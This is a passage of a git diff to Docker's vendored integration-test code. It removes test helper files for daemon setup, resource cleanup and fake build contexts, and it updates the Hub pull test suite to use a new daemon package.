check.IsNil) - - // remove the containers - dockerCmd(c, "rm", "-f", "first") - dockerCmd(c, "rm", "-f", "second") - // delete the network while preserving the parent link - dockerCmd(c, "network", "rm", netName) - assertNwNotAvailable(c, netName) - // verify the network delete did not delete the predefined sub-interface - out, err = linkExists(c, "dm-dummy0.20") - c.Assert(err, check.IsNil, check.Commentf(out)) - // delete the parent interface which also collects the slave - deleteInterface(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) -} - -func createMasterDummy(c *check.C, master string) (string, error) { - // ip link add type dummy - args := []string{"link", "add", master, "type", "dummy"} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - // ip link set dummy_name up - args = []string{"link", "set", master, "up"} - ipLinkCmd = exec.Command("ip", args...) - out, _, err = runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - return out, err -} - -func createVlanInterface(c *check.C, master, slave, id string) (string, error) { - // ip link add link name . type vlan id - args := []string{"link", "add", "link", master, "name", slave, "type", "vlan", "id", id} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - // ip link set up - args = []string{"link", "set", slave, "up"} - ipLinkCmd = exec.Command("ip", args...) - out, _, err = runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - return out, err -} - -func linkExists(c *check.C, master string) (string, error) { - // verify the specified link exists, ip link show - args := []string{"link", "show", master} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - return out, err -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go index df52cae1a4..125b8c10aa 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go @@ -5,7 +5,9 @@ import ( "runtime" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/go-check/check" ) @@ -25,7 +27,7 @@ func init() { // relative impact of each individual operation. As part of this suite, all // images are removed after each test. type DockerHubPullSuite struct { - d *Daemon + d *daemon.Daemon ds *DockerSuite } @@ -38,17 +40,15 @@ func newDockerHubPullSuite() *DockerHubPullSuite { // SetUpSuite starts the suite daemon. func (s *DockerHubPullSuite) SetUpSuite(c *check.C) { - testRequires(c, DaemonIsLinux) - s.d = NewDaemon(c) - err := s.d.Start() - c.Assert(err, checker.IsNil, check.Commentf("starting push/pull test daemon: %v", err)) + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + s.d.Start(c) } // TearDownSuite stops the suite daemon. func (s *DockerHubPullSuite) TearDownSuite(c *check.C) { if s.d != nil { - err := s.d.Stop() - c.Assert(err, checker.IsNil, check.Commentf("stopping push/pull test daemon: %v", err)) + s.d.Stop(c) } } @@ -84,7 +84,7 @@ func (s *DockerHubPullSuite) CmdWithError(name string, arg ...string) (string, e // MakeCmd returns an exec.Cmd command to run against the suite daemon. func (s *DockerHubPullSuite) MakeCmd(name string, arg ...string) *exec.Cmd { - args := []string{"--host", s.d.sock(), name} + args := []string{"--host", s.d.Sock(), name} args = append(args, arg...) return exec.Command(dockerBinary, args...) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go deleted file mode 100644 index 3559bfdbb7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go +++ /dev/null @@ -1,165 +0,0 @@ -package main - -import ( - "encoding/json" - "fmt" - "io/ioutil" - "os" - "os/exec" - "path/filepath" - "strconv" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/pkg/reexec" -) - -var ( - // the docker client binary to use - dockerBinary = "docker" - // the docker daemon binary to use - dockerdBinary = "dockerd" - - // path to containerd's ctr binary - ctrBinary = "docker-containerd-ctr" - - // the private registry image to use for tests involving the registry - registryImageName = "registry" - - // the private registry to use for tests - privateRegistryURL = "127.0.0.1:5000" - - // TODO Windows CI. These are incorrect and need fixing into - // platform specific pieces. - runtimePath = "/var/run/docker" - - workingDirectory string - - // isLocalDaemon is true if the daemon under test is on the same - // host as the CLI. - isLocalDaemon bool - - // daemonPlatform is held globally so that tests can make intelligent - // decisions on how to configure themselves according to the platform - // of the daemon. This is initialized in docker_utils by sending - // a version call to the daemon and examining the response header. - daemonPlatform string - - // windowsDaemonKV is used on Windows to distinguish between different - // versions. This is necessary to enable certain tests based on whether - // the platform supports it. For example, Windows Server 2016 TP3 did - // not support volumes, but TP4 did. - windowsDaemonKV int - - // daemonDefaultImage is the name of the default image to use when running - // tests. This is platform dependent. - daemonDefaultImage string - - // For a local daemon on Linux, these values will be used for testing - // user namespace support as the standard graph path(s) will be - // appended with the root remapped uid.gid prefix - dockerBasePath string - volumesConfigPath string - containerStoragePath string - - // experimentalDaemon tell whether the main daemon has - // experimental features enabled or not - experimentalDaemon bool - - // daemonStorageDriver is held globally so that tests can know the storage - // driver of the daemon. This is initialized in docker_utils by sending - // a version call to the daemon and examining the response header. - daemonStorageDriver string - - // WindowsBaseImage is the name of the base image for Windows testing - // Environment variable WINDOWS_BASE_IMAGE can override this - WindowsBaseImage = "microsoft/windowsservercore" - - // isolation is the isolation mode of the daemon under test - isolation container.Isolation - - // daemonPid is the pid of the main test daemon - daemonPid int - - daemonKernelVersion string -) - -const ( - // DefaultImage is the name of the base image for the majority of tests that - // are run across suites - DefaultImage = "busybox" -) - -func init() { - reexec.Init() - if dockerBin := os.Getenv("DOCKER_BINARY"); dockerBin != "" { - dockerBinary = dockerBin - } - var err error - dockerBinary, err = exec.LookPath(dockerBinary) - if err != nil { - fmt.Printf("ERROR: couldn't resolve full path to the Docker binary (%v)\n", err) - os.Exit(1) - } - if registryImage := os.Getenv("REGISTRY_IMAGE"); registryImage != "" { - registryImageName = registryImage - } - if registry := os.Getenv("REGISTRY_URL"); registry != "" { - privateRegistryURL = registry - } - workingDirectory, _ = os.Getwd() - - // Deterministically working out the environment in which CI is running - // to evaluate whether the daemon is local or remote is not possible through - // a build tag. - // - // For example Windows to Linux CI under Jenkins tests the 64-bit - // Windows binary build with the daemon build tag, but calls a remote - // Linux daemon. - // - // We can't just say if Windows then assume the daemon is local as at - // some point, we will be testing the Windows CLI against a Windows daemon. - // - // Similarly, it will be perfectly valid to also run CLI tests from - // a Linux CLI (built with the daemon tag) against a Windows daemon. - if len(os.Getenv("DOCKER_REMOTE_DAEMON")) > 0 { - isLocalDaemon = false - } else { - isLocalDaemon = true - } - - // TODO Windows CI. This are incorrect and need fixing into - // platform specific pieces. - // This is only used for a tests with local daemon true (Linux-only today) - // default is "/var/lib/docker", but we'll try and ask the - // /info endpoint for the specific root dir - dockerBasePath = "/var/lib/docker" - type Info struct { - DockerRootDir string - ExperimentalBuild bool - KernelVersion string - } - var i Info - status, b, err := sockRequest("GET", "/info", nil) - if err == nil && status == 200 { - if err = json.Unmarshal(b, &i); err == nil { - dockerBasePath = i.DockerRootDir - experimentalDaemon = i.ExperimentalBuild - daemonKernelVersion = i.KernelVersion - } - } - volumesConfigPath = dockerBasePath + "/volumes" - containerStoragePath = dockerBasePath + "/containers" - - if len(os.Getenv("WINDOWS_BASE_IMAGE")) > 0 { - WindowsBaseImage = os.Getenv("WINDOWS_BASE_IMAGE") - fmt.Println("INFO: Windows Base image is ", WindowsBaseImage) - } - - dest := os.Getenv("DEST") - b, err = ioutil.ReadFile(filepath.Join(dest, "docker.pid")) - if err == nil { - if p, err := strconv.ParseInt(string(b), 10, 32); err == nil { - daemonPid = int(p) - } - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_utils.go deleted file mode 100644 index 749e4b3357..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_utils.go +++ /dev/null @@ -1,1607 +0,0 @@ -package main - -import ( - "bufio" - "bytes" - "crypto/tls" - "encoding/json" - "errors" - "fmt" - "io" - "io/ioutil" - "net" - "net/http" - "net/http/httptest" - "net/http/httputil" - "net/url" - "os" - "os/exec" - "path" - "path/filepath" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api/types" - volumetypes "github.com/docker/docker/api/types/volume" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/httputils" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/go-connections/tlsconfig" - units "github.com/docker/go-units" - "github.com/go-check/check" -) - -func init() { - cmd := exec.Command(dockerBinary, "images", "-f", "dangling=false", "--format", "{{.Repository}}:{{.Tag}}") - cmd.Env = appendBaseEnv(true) - out, err := cmd.CombinedOutput() - if err != nil { - panic(fmt.Errorf("err=%v\nout=%s\n", err, out)) - } - images := strings.Split(strings.TrimSpace(string(out)), "\n") - for _, img := range images { - protectedImages[img] = struct{}{} - } - - res, body, err := sockRequestRaw("GET", "/info", nil, "application/json") - if err != nil { - panic(fmt.Errorf("Init failed to get /info: %v", err)) - } - defer body.Close() - if res.StatusCode != http.StatusOK { - panic(fmt.Errorf("Init failed to get /info. Res=%v", res)) - } - - svrHeader, _ := httputils.ParseServerHeader(res.Header.Get("Server")) - daemonPlatform = svrHeader.OS - if daemonPlatform != "linux" && daemonPlatform != "windows" { - panic("Cannot run tests against platform: " + daemonPlatform) - } - - // Now we know the daemon platform, can set paths used by tests. - var info types.Info - err = json.NewDecoder(body).Decode(&info) - if err != nil { - panic(fmt.Errorf("Init failed to unmarshal docker info: %v", err)) - } - - daemonStorageDriver = info.Driver - dockerBasePath = info.DockerRootDir - volumesConfigPath = filepath.Join(dockerBasePath, "volumes") - containerStoragePath = filepath.Join(dockerBasePath, "containers") - // Make sure in context of daemon, not the local platform. Note we can't - // use filepath.FromSlash or ToSlash here as they are a no-op on Unix. - if daemonPlatform == "windows" { - volumesConfigPath = strings.Replace(volumesConfigPath, `/`, `\`, -1) - containerStoragePath = strings.Replace(containerStoragePath, `/`, `\`, -1) - // On Windows, extract out the version as we need to make selective - // decisions during integration testing as and when features are implemented. - // eg in "10.0 10550 (10550.1000.amd64fre.branch.date-time)" we want 10550 - windowsDaemonKV, _ = strconv.Atoi(strings.Split(info.KernelVersion, " ")[1]) - } else { - volumesConfigPath = strings.Replace(volumesConfigPath, `\`, `/`, -1) - containerStoragePath = strings.Replace(containerStoragePath, `\`, `/`, -1) - } - isolation = info.Isolation -} - -func convertBasesize(basesizeBytes int64) (int64, error) { - basesize := units.HumanSize(float64(basesizeBytes)) - basesize = strings.Trim(basesize, " ")[:len(basesize)-3] - basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) - if err != nil { - return 0, err - } - return int64(basesizeFloat) * 1024 * 1024 * 1024, nil -} - -func daemonHost() string { - daemonURLStr := "unix://" + opts.DefaultUnixSocket - if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" { - daemonURLStr = daemonHostVar - } - return daemonURLStr -} - -func getTLSConfig() (*tls.Config, error) { - dockerCertPath := os.Getenv("DOCKER_CERT_PATH") - - if dockerCertPath == "" { - return nil, fmt.Errorf("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable") - } - - option := &tlsconfig.Options{ - CAFile: filepath.Join(dockerCertPath, "ca.pem"), - CertFile: filepath.Join(dockerCertPath, "cert.pem"), - KeyFile: filepath.Join(dockerCertPath, "key.pem"), - } - tlsConfig, err := tlsconfig.Client(*option) - if err != nil { - return nil, err - } - - return tlsConfig, nil -} - -func sockConn(timeout time.Duration, daemon string) (net.Conn, error) { - if daemon == "" { - daemon = daemonHost() - } - daemonURL, err := url.Parse(daemon) - if err != nil { - return nil, fmt.Errorf("could not parse url %q: %v", daemon, err) - } - - var c net.Conn - switch daemonURL.Scheme { - case "npipe": - return npipeDial(daemonURL.Path, timeout) - case "unix": - return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout) - case "tcp": - if os.Getenv("DOCKER_TLS_VERIFY") != "" { - // Setup the socket TLS configuration. - tlsConfig, err := getTLSConfig() - if err != nil { - return nil, err - } - dialer := &net.Dialer{Timeout: timeout} - return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig) - } - return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout) - default: - return c, fmt.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon) - } -} - -func sockRequest(method, endpoint string, data interface{}) (int, []byte, error) { - jsonData := bytes.NewBuffer(nil) - if err := json.NewEncoder(jsonData).Encode(data); err != nil { - return -1, nil, err - } - - res, body, err := sockRequestRaw(method, endpoint, jsonData, "application/json") - if err != nil { - return -1, nil, err - } - b, err := readBody(body) - return res.StatusCode, b, err -} - -func sockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { - return sockRequestRawToDaemon(method, endpoint, data, ct, "") -} - -func sockRequestRawToDaemon(method, endpoint string, data io.Reader, ct, daemon string) (*http.Response, io.ReadCloser, error) { - req, client, err := newRequestClient(method, endpoint, data, ct, daemon) - if err != nil { - return nil, nil, err - } - - resp, err := client.Do(req) - if err != nil { - client.Close() - return nil, nil, err - } - body := ioutils.NewReadCloserWrapper(resp.Body, func() error { - defer resp.Body.Close() - return client.Close() - }) - - return resp, body, nil -} - -func sockRequestHijack(method, endpoint string, data io.Reader, ct string) (net.Conn, *bufio.Reader, error) { - req, client, err := newRequestClient(method, endpoint, data, ct, "") - if err != nil { - return nil, nil, err - } - - client.Do(req) - conn, br := client.Hijack() - return conn, br, nil -} - -func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string) (*http.Request, *httputil.ClientConn, error) { - c, err := sockConn(time.Duration(10*time.Second), daemon) - if err != nil { - return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err) - } - - client := httputil.NewClientConn(c, nil) - - req, err := http.NewRequest(method, endpoint, data) - if err != nil { - client.Close() - return nil, nil, fmt.Errorf("could not create new request: %v", err) - } - - if ct != "" { - req.Header.Set("Content-Type", ct) - } - return req, client, nil -} - -func readBody(b io.ReadCloser) ([]byte, error) { - defer b.Close() - return ioutil.ReadAll(b) -} - -func deleteContainer(container ...string) error { - result := icmd.RunCommand(dockerBinary, append([]string{"rm", "-fv"}, container...)...) - return result.Compare(icmd.Success) -} - -func getAllContainers() (string, error) { - getContainersCmd := exec.Command(dockerBinary, "ps", "-q", "-a") - out, exitCode, err := runCommandWithOutput(getContainersCmd) - if exitCode != 0 && err == nil { - err = fmt.Errorf("failed to get a list of containers: %v\n", out) - } - - return out, err -} - -func deleteAllContainers() error { - containers, err := getAllContainers() - if err != nil { - fmt.Println(containers) - return err - } - if containers == "" { - return nil - } - - err = deleteContainer(strings.Split(strings.TrimSpace(containers), "\n")...) - if err != nil { - fmt.Println(err.Error()) - } - return err -} - -func deleteAllNetworks() error { - networks, err := getAllNetworks() - if err != nil { - return err - } - var errors []string - for _, n := range networks { - if n.Name == "bridge" || n.Name == "none" || n.Name == "host" { - continue - } - if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" { - // nat is a pre-defined network on Windows and cannot be removed - continue - } - status, b, err := sockRequest("DELETE", "/networks/"+n.Name, nil) - if err != nil { - errors = append(errors, err.Error()) - continue - } - if status != http.StatusNoContent { - errors = append(errors, fmt.Sprintf("error deleting network %s: %s", n.Name, string(b))) - } - } - if len(errors) > 0 { - return fmt.Errorf(strings.Join(errors, "\n")) - } - return nil -} - -func getAllNetworks() ([]types.NetworkResource, error) { - var networks []types.NetworkResource - _, b, err := sockRequest("GET", "/networks", nil) - if err != nil { - return nil, err - } - if err := json.Unmarshal(b, &networks); err != nil { - return nil, err - } - return networks, nil -} - -func deleteAllPlugins() error { - plugins, err := getAllPlugins() - if err != nil { - return err - } - var errors []string - for _, p := range plugins { - status, b, err := sockRequest("DELETE", "/plugins/"+p.Name+"?force=1", nil) - if err != nil { - errors = append(errors, err.Error()) - continue - } - if status != http.StatusNoContent { - errors = append(errors, fmt.Sprintf("error deleting plugin %s: %s", p.Name, string(b))) - } - } - if len(errors) > 0 { - return fmt.Errorf(strings.Join(errors, "\n")) - } - return nil -} - -func getAllPlugins() (types.PluginsListResponse, error) { - var plugins types.PluginsListResponse - _, b, err := sockRequest("GET", "/plugins", nil) - if err != nil { - return nil, err - } - if err := json.Unmarshal(b, &plugins); err != nil { - return nil, err - } - return plugins, nil -} - -func deleteAllVolumes() error { - volumes, err := getAllVolumes() - if err != nil { - return err - } - var errors []string - for _, v := range volumes { - status, b, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) - if err != nil { - errors = append(errors, err.Error()) - continue - } - if status != http.StatusNoContent { - errors = append(errors, fmt.Sprintf("error deleting volume %s: %s", v.Name, string(b))) - } - } - if len(errors) > 0 { - return fmt.Errorf(strings.Join(errors, "\n")) - } - return nil -} - -func getAllVolumes() ([]*types.Volume, error) { - var volumes volumetypes.VolumesListOKBody - _, b, err := sockRequest("GET", "/volumes", nil) - if err != nil { - return nil, err - } - if err := json.Unmarshal(b, &volumes); err != nil { - return nil, err - } - return volumes.Volumes, nil -} - -var protectedImages = map[string]struct{}{} - -func deleteAllImages() error { - cmd := exec.Command(dockerBinary, "images") - cmd.Env = appendBaseEnv(true) - out, err := cmd.CombinedOutput() - if err != nil { - return err - } - lines := strings.Split(string(out), "\n")[1:] - var imgs []string - for _, l := range lines { - if l == "" { - continue - } - fields := strings.Fields(l) - imgTag := fields[0] + ":" + fields[1] - if _, ok := protectedImages[imgTag]; !ok { - if fields[0] == "" { - imgs = append(imgs, fields[2]) - continue - } - imgs = append(imgs, imgTag) - } - } - if len(imgs) == 0 { - return nil - } - args := append([]string{"rmi", "-f"}, imgs...) - if err := exec.Command(dockerBinary, args...).Run(); err != nil { - return err - } - return nil -} - -func getPausedContainers() (string, error) { - getPausedContainersCmd := exec.Command(dockerBinary, "ps", "-f", "status=paused", "-q", "-a") - out, exitCode, err := runCommandWithOutput(getPausedContainersCmd) - if exitCode != 0 && err == nil { - err = fmt.Errorf("failed to get a list of paused containers: %v\n", out) - } - - return out, err -} - -func getSliceOfPausedContainers() ([]string, error) { - out, err := getPausedContainers() - if err == nil { - if len(out) == 0 { - return nil, err - } - slice := strings.Split(strings.TrimSpace(out), "\n") - return slice, err - } - return []string{out}, err -} - -func unpauseContainer(container string) error { - return icmd.RunCommand(dockerBinary, "unpause", container).Error -} - -func unpauseAllContainers() error { - containers, err := getPausedContainers() - if err != nil { - fmt.Println(containers) - return err - } - - containers = strings.Replace(containers, "\n", " ", -1) - containers = strings.Trim(containers, " ") - containerList := strings.Split(containers, " ") - - for _, value := range containerList { - if err = unpauseContainer(value); err != nil { - return err - } - } - - return nil -} - -func deleteImages(images ...string) error { - args := []string{dockerBinary, "rmi", "-f"} - return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error -} - -func imageExists(image string) error { - return icmd.RunCommand(dockerBinary, "inspect", image).Error -} - -func pullImageIfNotExist(image string) error { - if err := imageExists(image); err != nil { - pullCmd := exec.Command(dockerBinary, "pull", image) - _, exitCode, err := runCommandWithOutput(pullCmd) - - if err != nil || exitCode != 0 { - return fmt.Errorf("image %q wasn't found locally and it couldn't be pulled: %s", image, err) - } - } - return nil -} - -func dockerCmdWithError(args ...string) (string, int, error) { - if err := validateArgs(args...); err != nil { - return "", 0, err - } - result := icmd.RunCommand(dockerBinary, args...) - if result.Error != nil { - return result.Combined(), result.ExitCode, result.Compare(icmd.Success) - } - return result.Combined(), result.ExitCode, result.Error -} - -func dockerCmdWithStdoutStderr(c *check.C, args ...string) (string, string, int) { - if err := validateArgs(args...); err != nil { - c.Fatalf(err.Error()) - } - - result := icmd.RunCommand(dockerBinary, args...) - // TODO: why is c ever nil? - if c != nil { - c.Assert(result, icmd.Matches, icmd.Success) - } - return result.Stdout(), result.Stderr(), result.ExitCode -} - -func dockerCmd(c *check.C, args ...string) (string, int) { - if err := validateArgs(args...); err != nil { - c.Fatalf(err.Error()) - } - result := icmd.RunCommand(dockerBinary, args...) - c.Assert(result, icmd.Matches, icmd.Success) - return result.Combined(), result.ExitCode -} - -func dockerCmdWithResult(args ...string) *icmd.Result { - return icmd.RunCommand(dockerBinary, args...) -} - -func binaryWithArgs(args ...string) []string { - return append([]string{dockerBinary}, args...) -} - -// execute a docker command with a timeout -func dockerCmdWithTimeout(timeout time.Duration, args ...string) *icmd.Result { - if err := validateArgs(args...); err != nil { - return &icmd.Result{Error: err} - } - return icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Timeout: timeout}) -} - -// execute a docker command in a directory -func dockerCmdInDir(c *check.C, path string, args ...string) (string, int, error) { - if err := validateArgs(args...); err != nil { - c.Fatalf(err.Error()) - } - result := icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Dir: path}) - return result.Combined(), result.ExitCode, result.Error -} - -// execute a docker command in a directory with a timeout -func dockerCmdInDirWithTimeout(timeout time.Duration, path string, args ...string) *icmd.Result { - if err := validateArgs(args...); err != nil { - return &icmd.Result{Error: err} - } - return icmd.RunCmd(icmd.Cmd{ - Command: binaryWithArgs(args...), - Timeout: timeout, - Dir: path, - }) -} - -// validateArgs is a checker to ensure tests are not running commands which are -// not supported on platforms. Specifically on Windows this is 'busybox top'. -func validateArgs(args ...string) error { - if daemonPlatform != "windows" { - return nil - } - foundBusybox := -1 - for key, value := range args { - if strings.ToLower(value) == "busybox" { - foundBusybox = key - } - if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") { - return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()") - } - } - return nil -} - -// find the State.ExitCode in container metadata -func findContainerExitCode(c *check.C, name string, vargs ...string) string { - args := append(vargs, "inspect", "--format='{{ .State.ExitCode }} {{ .State.Error }}'", name) - cmd := exec.Command(dockerBinary, args...) - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } - return out -} - -func findContainerIP(c *check.C, id string, network string) string { - out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id) - return strings.Trim(out, " \r\n'") -} - -func getContainerCount() (int, error) { - const containers = "Containers:" - - cmd := exec.Command(dockerBinary, "info") - out, _, err := runCommandWithOutput(cmd) - if err != nil { - return 0, err - } - - lines := strings.Split(out, "\n") - for _, line := range lines { - if strings.Contains(line, containers) { - output := strings.TrimSpace(line) - output = strings.TrimLeft(output, containers) - output = strings.Trim(output, " ") - containerCount, err := strconv.Atoi(output) - if err != nil { - return 0, err - } - return containerCount, nil - } - } - return 0, fmt.Errorf("couldn't find the Container count in the output") -} - -// FakeContext creates directories that can be used as a build context -type FakeContext struct { - Dir string -} - -// Add a file at a path, creating directories where necessary -func (f *FakeContext) Add(file, content string) error { - return f.addFile(file, []byte(content)) -} - -func (f *FakeContext) addFile(file string, content []byte) error { - fp := filepath.Join(f.Dir, filepath.FromSlash(file)) - dirpath := filepath.Dir(fp) - if dirpath != "." { - if err := os.MkdirAll(dirpath, 0755); err != nil { - return err - } - } - return ioutil.WriteFile(fp, content, 0644) - -} - -// Delete a file at a path -func (f *FakeContext) Delete(file string) error { - fp := filepath.Join(f.Dir, filepath.FromSlash(file)) - return os.RemoveAll(fp) -} - -// Close deletes the context -func (f *FakeContext) Close() error { - return os.RemoveAll(f.Dir) -} - -func fakeContextFromNewTempDir() (*FakeContext, error) { - tmp, err := ioutil.TempDir("", "fake-context") - if err != nil { - return nil, err - } - if err := os.Chmod(tmp, 0755); err != nil { - return nil, err - } - return fakeContextFromDir(tmp), nil -} - -func fakeContextFromDir(dir string) *FakeContext { - return &FakeContext{dir} -} - -func fakeContextWithFiles(files map[string]string) (*FakeContext, error) { - ctx, err := fakeContextFromNewTempDir() - if err != nil { - return nil, err - } - for file, content := range files { - if err := ctx.Add(file, content); err != nil { - ctx.Close() - return nil, err - } - } - return ctx, nil -} - -func fakeContextAddDockerfile(ctx *FakeContext, dockerfile string) error { - if err := ctx.Add("Dockerfile", dockerfile); err != nil { - ctx.Close() - return err - } - return nil -} - -func fakeContext(dockerfile string, files map[string]string) (*FakeContext, error) { - ctx, err := fakeContextWithFiles(files) - if err != nil { - return nil, err - } - if err := fakeContextAddDockerfile(ctx, dockerfile); err != nil { - return nil, err - } - return ctx, nil -} - -// FakeStorage is a static file server. It might be running locally or remotely -// on test host. -type FakeStorage interface { - Close() error - URL() string - CtxDir() string -} - -func fakeBinaryStorage(archives map[string]*bytes.Buffer) (FakeStorage, error) { - ctx, err := fakeContextFromNewTempDir() - if err != nil { - return nil, err - } - for name, content := range archives { - if err := ctx.addFile(name, content.Bytes()); err != nil { - return nil, err - } - } - return fakeStorageWithContext(ctx) -} - -// fakeStorage returns either a local or remote (at daemon machine) file server -func fakeStorage(files map[string]string) (FakeStorage, error) { - ctx, err := fakeContextWithFiles(files) - if err != nil { - return nil, err - } - return fakeStorageWithContext(ctx) -} - -// fakeStorageWithContext returns either a local or remote (at daemon machine) file server -func fakeStorageWithContext(ctx *FakeContext) (FakeStorage, error) { - if isLocalDaemon { - return newLocalFakeStorage(ctx) - } - return newRemoteFileServer(ctx) -} - -// localFileStorage is a file storage on the running machine -type localFileStorage struct { - *FakeContext - *httptest.Server -} - -func (s *localFileStorage) URL() string { - return s.Server.URL -} - -func (s *localFileStorage) CtxDir() string { - return s.FakeContext.Dir -} - -func (s *localFileStorage) Close() error { - defer s.Server.Close() - return s.FakeContext.Close() -} - -func newLocalFakeStorage(ctx *FakeContext) (*localFileStorage, error) { - handler := http.FileServer(http.Dir(ctx.Dir)) - server := httptest.NewServer(handler) - return &localFileStorage{ - FakeContext: ctx, - Server: server, - }, nil -} - -// remoteFileServer is a containerized static file server started on the remote -// testing machine to be used in URL-accepting docker build functionality. -type remoteFileServer struct { - host string // hostname/port web server is listening to on docker host e.g. 0.0.0.0:43712 - container string - image string - ctx *FakeContext -} - -func (f *remoteFileServer) URL() string { - u := url.URL{ - Scheme: "http", - Host: f.host} - return u.String() -} - -func (f *remoteFileServer) CtxDir() string { - return f.ctx.Dir -} - -func (f *remoteFileServer) Close() error { - defer func() { - if f.ctx != nil { - f.ctx.Close() - } - if f.image != "" { - deleteImages(f.image) - } - }() - if f.container == "" { - return nil - } - return deleteContainer(f.container) -} - -func newRemoteFileServer(ctx *FakeContext) (*remoteFileServer, error) { - var ( - image = fmt.Sprintf("fileserver-img-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) - container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) - ) - - if err := ensureHTTPServerImage(); err != nil { - return nil, err - } - - // Build the image - if err := fakeContextAddDockerfile(ctx, `FROM httpserver -COPY . /static`); err != nil { - return nil, fmt.Errorf("Cannot add Dockerfile to context: %v", err) - } - if _, err := buildImageFromContext(image, ctx, false); err != nil { - return nil, fmt.Errorf("failed building file storage container image: %v", err) - } - - // Start the container - runCmd := exec.Command(dockerBinary, "run", "-d", "-P", "--name", container, image) - if out, ec, err := runCommandWithOutput(runCmd); err != nil { - return nil, fmt.Errorf("failed to start file storage container. ec=%v\nout=%s\nerr=%v", ec, out, err) - } - - // Find out the system assigned port - out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "port", container, "80/tcp")) - if err != nil { - return nil, fmt.Errorf("failed to find container port: err=%v\nout=%s", err, out) - } - - fileserverHostPort := strings.Trim(out, "\n") - _, port, err := net.SplitHostPort(fileserverHostPort) - if err != nil { - return nil, fmt.Errorf("unable to parse file server host:port: %v", err) - } - - dockerHostURL, err := url.Parse(daemonHost()) - if err != nil { - return nil, fmt.Errorf("unable to parse daemon host URL: %v", err) - } - - host, _, err := net.SplitHostPort(dockerHostURL.Host) - if err != nil { - return nil, fmt.Errorf("unable to parse docker daemon host:port: %v", err) - } - - return &remoteFileServer{ - container: container, - image: image, - host: fmt.Sprintf("%s:%s", host, port), - ctx: ctx}, nil -} - -func inspectFieldAndMarshall(c *check.C, name, field string, output interface{}) { - str := inspectFieldJSON(c, name, field) - err := json.Unmarshal([]byte(str), output) - if c != nil { - c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err)) - } -} - -func inspectFilter(name, filter string) (string, error) { - format := fmt.Sprintf("{{%s}}", filter) - inspectCmd := exec.Command(dockerBinary, "inspect", "-f", format, name) - out, exitCode, err := runCommandWithOutput(inspectCmd) - if err != nil || exitCode != 0 { - return "", fmt.Errorf("failed to inspect %s: %s", name, out) - } - return strings.TrimSpace(out), nil -} - -func inspectFieldWithError(name, field string) (string, error) { - return inspectFilter(name, fmt.Sprintf(".%s", field)) -} - -func inspectField(c *check.C, name, field string) string { - out, err := inspectFilter(name, fmt.Sprintf(".%s", field)) - if c != nil { - c.Assert(err, check.IsNil) - } - return out -} - -func inspectFieldJSON(c *check.C, name, field string) string { - out, err := inspectFilter(name, fmt.Sprintf("json .%s", field)) - if c != nil { - c.Assert(err, check.IsNil) - } - return out -} - -func inspectFieldMap(c *check.C, name, path, field string) string { - out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field)) - if c != nil { - c.Assert(err, check.IsNil) - } - return out -} - -func inspectMountSourceField(name, destination string) (string, error) { - m, err := inspectMountPoint(name, destination) - if err != nil { - return "", err - } - return m.Source, nil -} - -func inspectMountPoint(name, destination string) (types.MountPoint, error) { - out, err := 